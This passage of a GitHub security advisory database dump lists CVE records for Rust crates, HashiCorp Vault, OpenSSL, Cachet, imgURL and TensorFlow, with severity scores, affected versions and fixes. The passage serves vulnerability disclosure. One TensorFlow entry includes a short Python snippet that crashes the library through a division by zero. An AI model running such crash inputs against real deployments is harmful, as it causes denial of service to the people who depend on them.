code..","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'multihash'}, 'ecosystem_specific': {'affected_functions': ['multihash::digests::MultihashGeneric::from_bytes', 'multihash::digests::MultihashRefGeneric::from_slice']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35909'}, {'type': 'WEB', 'url': 'https://github.com/multiformats/rust-multihash/pull/72'}, {'type': 'PACKAGE', 'url': 'https://github.com/multiformats/rust-multihash'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0068.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T20:51:29Z', 'nvd_published_at': None}" +1.4.0,GHSA-23fq-q7hc-993r,2022-08-11T21:57:44Z,2021-08-30T17:22:53Z,,['CVE-2021-38553'],HashiCorp Vault underlying database had excessively broad filesystem permissions from v1.4.0 until v1.8.0,HashiCorp Vault and Vault Enterprise 1.4.0 through 1.7.3 initialized an underlying database file associated with the Integrated Storage feature with excessively broad filesystem permissions. Fixed in Vault and Vault Enterprise 1.8.0.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38553'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-20-vault-s-integrated-storage-backend-database-file-may-have-excessively-broad-permissions/28168'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202207-01'}]","{'cwe_ids': ['CWE-281'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-30T17:16:42Z', 'nvd_published_at': '2021-08-13T16:15:00Z'}" +1.4.0,GHSA-85j6-f8j6-q26x,2023-06-13T19:59:50Z,2021-08-25T20:48:12Z,,['CVE-2020-35894'],Unaligned references in Obstack,Obstack generates unaligned references for types that require a large alignment.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'obstack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35894'}, {'type': 'WEB', 'url': 'https://github.com/petertodd/rust-obstack/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/petertodd/rust-obstack'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0040.html'}]","{'cwe_ids': ['CWE-706'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:06:51Z', 'nvd_published_at': None}" +1.4.0,GHSA-hpcx-3pw8-g3j2,2022-06-14T20:23:55Z,2021-08-25T20:54:22Z,,['CVE-2021-29937'],Free of uninitialized memory in telemetry,An issue was discovered in the telemetry crate through 0.1.2 for Rust. There is a drop of uninitialized memory if a value.clone() call panics within misc::vec_with_size(),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'telemetry'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29937'}, {'type': 'WEB', 'url': 'https://github.com/Yoric/telemetry.rs/issues/45'}, {'type': 'WEB', 'url': 'https://github.com/Yoric/telemetry.rs/commit/2820cf12f2e08645fd6d1f15b4a90a54d6082a81'}, {'type': 'PACKAGE', 'url': 'https://github.com/Yoric/telemetry.rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0046.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:09:26Z', 'nvd_published_at': '2021-04-01T05:15:00Z'}" +1.4.0,GHSA-69gw-hgj3-45m7,2023-06-13T21:37:37Z,2021-08-25T20:43:58Z,,['CVE-2019-15554'],Memory corruption in smallvec,Attempting to call grow on a spilled SmallVec with a value less than the current capacity causes corruption of memory allocator data structures. An attacker that controls the value passed to grow may exploit this flaw to obtain memory contents or gain remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'smallvec'}, 'ecosystem_specific': {'affected_functions': ['smallvec::SmallVec::grow']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.3'}, {'fixed': '0.6.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15554'}, {'type': 'WEB', 'url': 'https://github.com/servo/rust-smallvec/issues/149'}, {'type': 'PACKAGE', 'url': 'https://github.com/servo/rust-smallvec'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0012.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:23:44Z', 'nvd_published_at': None}" +1.4.0,GHSA-8hfj-xrj2-pm22,2023-08-04T18:38:54Z,2021-08-25T20:54:00Z,,['CVE-2021-3450'],Certificate check bypass in openssl-src,"The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a ""purpose"" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named ""purpose"" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '111.11.0'}, {'fixed': '111.15.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3450'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/openssl-src-rs'}, {'type': 'WEB', 'url': 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845'}, {'type': 'WEB', 'url': 'https://kc.mcafee.com/corporate/index?page=content&id=SB10356'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/'}, {'type': 'WEB', 'url': 'https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html'}, {'type': 'WEB', 'url': 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0056.html'}, {'type': 'WEB', 'url': 'https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202103-03'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210326-0006/'}, {'type': 'WEB', 'url': 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20210325.txt'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-05'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-08'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-09'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/27/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/27/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/28/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/03/28/4'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:22:00Z', 'nvd_published_at': '2021-03-25T15:15:00Z'}" +1.4.0,GHSA-rg4m-gww5-7p47,2021-08-19T17:14:41Z,2021-08-25T20:54:18Z,,['CVE-2021-29936'],Free of uninitialized memory in adtensor,An issue was discovered in the adtensor crate through 0.0.3 for Rust. There is a drop of uninitialized memory via the FromIterator implementation for Vector and Matrix.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'adtensor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29936'}, {'type': 'WEB', 'url': 'https://github.com/charles-r-earp/adtensor/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/charles-r-earp/adtensor'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0045.html'}]","{'cwe_ids': ['CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:14:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-qjj8-32p7-h289,2021-08-24T12:42:21Z,2021-08-25T14:43:04Z,,['CVE-2021-37653'],Division by 0 in `ResourceGather`,"### Impact +An attacker can trigger a crash via a floating point exception in `tf.raw_ops.ResourceGather`: + +```python +import tensorflow as tf + +tensor = tf.constant(value=[[]],shape=(0,1),dtype=tf.uint32) +v = tf.Variable(tensor) +tf.raw_ops.ResourceGather( + resource=v.handle, + indices=[0], + dtype=tf.uint32, + batch_dims=1, + validate_indices=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/f24faa153ad31a4b51578f8181d3aaab77a1ddeb/tensorflow/core/kernels/resource_variable_ops.cc#L725-L731) computes the value of a value, `batch_size`, and then divides by it without checking that this value is not 0. + +### Patches +We have patched the issue in GitHub commit [ac117ee8a8ea57b73d34665cdf00ef3303bc0b11](https://github.com/tensorflow/tensorflow/commit/ac117ee8a8ea57b73d34665cdf00ef3303bc0b11). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qjj8-32p7-h289'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37653'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/ac117ee8a8ea57b73d34665cdf00ef3303bc0b11'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow/'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T12:41:26Z', 'nvd_published_at': '2021-08-12T18:15:00Z'}" +1.4.0,GHSA-r67m-m8c7-jp83,2022-08-16T18:40:56Z,2021-08-30T16:11:33Z,,['CVE-2021-39173'],Cachet vulnerable to forced reinstall,"### Impact + +Authenticated users, regardless of their privileges (_User_ or _Admin_), can trick Cachet and install the instance again, leading to arbitrary code execution on the server. + +### Patches + +This issue was addressed by improving the middleware `ReadyForUse`, which now performs a stricter validation of the instance name. + +### Workarounds + +Only allow trusted source IP addresses to access to the administration dashboard. + +### References + +- https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection + +### For more information + +If you have any questions or comments about this advisory, you can contact: +- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; +- The maintainers, by opening an issue on this repository. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cachethq/cachet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/security/advisories/GHSA-r67m-m8c7-jp83'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39173'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection/'}, {'type': 'PACKAGE', 'url': 'https://github.com/fiveai/Cachet'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/releases/tag/v2.5.1'}]","{'cwe_ids': ['CWE-704'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T23:34:37Z', 'nvd_published_at': '2021-08-27T23:15:00Z'}" +1.4.0,GHSA-vq23-5h4f-vwpv,2022-06-15T19:41:47Z,2021-08-25T21:01:35Z,,['CVE-2020-36212'],Update unsound DrainFilter and RString::retain,An issue was discovered in the abi_stable crate before 0.9.1 for Rust. DrainFilter lacks soundness because of a double drop.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'abi_stable'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36212'}, {'type': 'WEB', 'url': 'https://github.com/rodrimati1992/abi_stable_crates/issues/44'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0105.html'}]","{'cwe_ids': ['CWE-672'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:17:19Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}" +1.4.0,GHSA-39vw-qp34-rmwf,2023-06-13T21:03:35Z,2021-08-25T21:00:18Z,,[],Uncontrolled recursion leads to abort in deserialization,"Affected versions of this crate did not properly check for recursion while deserializing aliases. This allows an attacker to make a YAML file with an alias referring to itself causing an abort. The flaw was corrected by checking the recursion depth. +",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'serde_yaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.6.0-rc1'}, {'fixed': '0.8.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dtolnay/serde-yaml/pull/105'}, {'type': 'WEB', 'url': 'https://github.com/dtolnay/serde-yaml/commit/b93aff6e904cffbbfd1f421b82f6dcc5ca19a4fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/dtolnay/serde-yaml'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0005.html'}]","{'cwe_ids': ['CWE-674'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-06T17:45:03Z', 'nvd_published_at': None}" +1.4.0,GHSA-566x-hhrf-qf8m,2023-06-13T19:51:43Z,2021-08-25T20:50:30Z,,['CVE-2020-35923'],ordered_float:NotNan may contain NaN after panic in assignment operators,"After using an assignment operators such as NotNan::add_assign, NotNan::mul_assign, etc., it was possible for the resulting NotNan value to contain a NaN. This could cause undefined behavior in safe code, because the safe NotNan::cmp method contains internal unsafe code that assumes the value is never NaN. (It could also cause undefined behavior in third-party unsafe code that makes the same assumption, as well as logic errors in safe code.) + +This was mitigated starting in version 0.4.0, by panicking if the assigned value is NaN. However, in affected versions from 0.4.0 onward, code that uses the NotNan value during unwinding, or that continues after catching the panic, could still observe the invalid value and trigger undefined behavior. + +The flaw is fully corrected in versions 1.1.1 and 2.0.1, by ensuring that the assignment operators panic without modifying the operand, if the result would be NaN.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'ordered-float'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.1'}]}], 'versions': ['2.0.0']}, {'package': {'ecosystem': 'crates.io', 'name': 'ordered-float'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.2'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35923'}, {'type': 'WEB', 'url': 'https://github.com/reem/rust-ordered-float/pull/71'}, {'type': 'WEB', 'url': 'https://github.com/reem/rust-ordered-float/commit/c55cda301c943270b7eb2b4765bedbcce56edb90'}, {'type': 'WEB', 'url': 'https://github.com/reem/rust-ordered-float/commit/da4a8dd49300740a434c095a9c4b408d2415cc08'}, {'type': 'PACKAGE', 'url': 'https://github.com/reem/rust-ordered-float'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0082.html'}]","{'cwe_ids': ['CWE-460'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:54:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-j8qq-58cr-8cc7,2022-05-05T00:44:22Z,2021-08-25T20:52:53Z,,['CVE-2021-25905'],Out of bounds read in bra,Buffered Random Access (BRA) provides easy random memory access to a sequential source of data in Rust. This is achieved by greedily retaining all memory read from a given source. Buffered Random Access (BRA) provides easy random memory access to a sequential source of data in Rust. An issue was discovered in the bra crate before 0.1.1 for Rust. It lacks soundness because it can read uninitialized memory.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'bra'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25905'}, {'type': 'WEB', 'url': 'https://github.com/Enet4/bra-rs/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/Enet4/bra-rs/commit/aabf5562f8c6374ab30f615b28e0cff9b5c79e5f'}, {'type': 'PACKAGE', 'url': 'https://github.com/Enet4/bra-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0008.html'}]","{'cwe_ids': ['CWE-125', 'CWE-908'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:46:05Z', 'nvd_published_at': '2021-01-26T18:16:00Z'}" +1.4.0,GHSA-w3g5-2848-2v8r,2021-08-24T18:04:25Z,2021-08-25T20:57:05Z,,['CVE-2020-36471'],Data races in generator,"The `Generator` type is an iterable which uses a generator function that yields +values. In affected versions of the crate, the provided function yielding values +had no `Send` bounds despite the `Generator` itself implementing `Send`. + +The generator function lacking a `Send` bound means that types that are +dangerous to send across threads such as `Rc` could be sent as part of a +generator, potentially leading to data races. + +This flaw was fixed in commit [`f7d120a3b`](https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0) +by enforcing that the generator function be bound by `Send`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'generator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36471'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/issues/27'}, {'type': 'WEB', 'url': 'https://github.com/Xudong-Huang/generator-rs/commit/f7d120a3b724d06a7b623d0a4306acf8f78cb4f0'}, {'type': 'PACKAGE', 'url': 'https://github.com/Xudong-Huang/generator-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/generator/RUSTSEC-2020-0151.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0151.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:33:21Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-3gp6-hhfw-4gqx,2021-06-28T19:05:25Z,2021-08-13T15:22:24Z,,['CVE-2010-3300'],Padding oracle attacks,It was found that all OWASP ESAPI for Java up to version 2.0 RC2 are vulnerable to padding oracle attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.owasp.esapi:esapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0GA'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2010-3300'}, {'type': 'WEB', 'url': 'https://seclists.org/oss-sec/2010/q3/357'}, {'type': 'WEB', 'url': 'https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf'}]","{'cwe_ids': ['CWE-649'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T20:07:33Z', 'nvd_published_at': '2021-06-22T12:15:00Z'}" +1.4.0,GHSA-vhfr-v4w9-45v8,2023-06-13T20:28:01Z,2021-08-25T20:44:51Z,,['CVE-2019-16142'],Improper Input Validation in renderdoc,"Affected versions of this crate exposed several methods which took self by immutable reference, despite the requesting the RenderDoc API to set a mutable value internally. This is technically unsound and calling these methods from multiple threads without synchronization could lead to unexpected and unpredictable behavior. The flaw was corrected in release 0.5.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'renderdoc'}, 'ecosystem_specific': {'affected_functions': ['renderdoc::api::RenderDocV110::trigger_multi_frame_capture', 'renderdoc::api::RenderDocV120::set_capture_file_comments']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16142'}, {'type': 'WEB', 'url': 'https://github.com/ebkalderon/renderdoc-rs/pull/32'}, {'type': 'PACKAGE', 'url': 'https://github.com/ebkalderon/renderdoc-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2019-0018.html'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:22:34Z', 'nvd_published_at': '2019-09-09T12:15:00Z'}" +1.4.0,GHSA-8gmx-cpcg-f8h5,2023-06-13T17:37:47Z,2021-08-25T20:55:11Z,,['CVE-2021-30455'],Double-free in id-map,"The clone_from implementation for IdMap drops the values present in the map and then begins cloning values from the other map. If a .clone() call pancics, then the afformentioned dropped elements can be freed again. +get_or_insert + +get_or_insert reserves space for a value, before calling the user provided insertion function f. If the function f panics then uninitialized or previously freed memory can be dropped. +remove_set + +When removing a set of elements, ptr::drop_in_place is called on each of the element to be removed. If the Drop impl of one of these elements panics then the previously dropped elements can be dropped again.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'id-map'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30455'}, {'type': 'WEB', 'url': 'https://github.com/andrewhickman/id-map/issues/3'}, {'type': 'PACKAGE', 'url': 'https://github.com/andrewhickman/id-map'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0052.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T17:04:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-f2rp-j8hv-g5gx,2021-08-26T16:24:16Z,2021-08-30T16:25:26Z,,['CVE-2021-38713'],Cross-site scripting in imgURL,imgURL 2.31 allows XSS via an X-Forwarded-For HTTP header.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'helloxz/imgurl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38713'}, {'type': 'WEB', 'url': 'https://github.com/helloxz/imgurl/issues/72'}, {'type': 'PACKAGE', 'url': 'https://github.com/helloxz/imgurl'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T16:24:16Z', 'nvd_published_at': '2021-08-16T04:15:00Z'}" +1.4.0,GHSA-j2r6-2m5c-vgh5,2021-08-19T21:20:52Z,2021-08-25T20:45:20Z,,['CVE-2019-25005'],Counter overflow in chacha20,An issue was discovered in the chacha20 crate before 0.2.3 for Rust. A ChaCha20 counter overflow makes it easier for attackers to determine plaintext.,"[{'type': 'CVSS_V3', 'score': 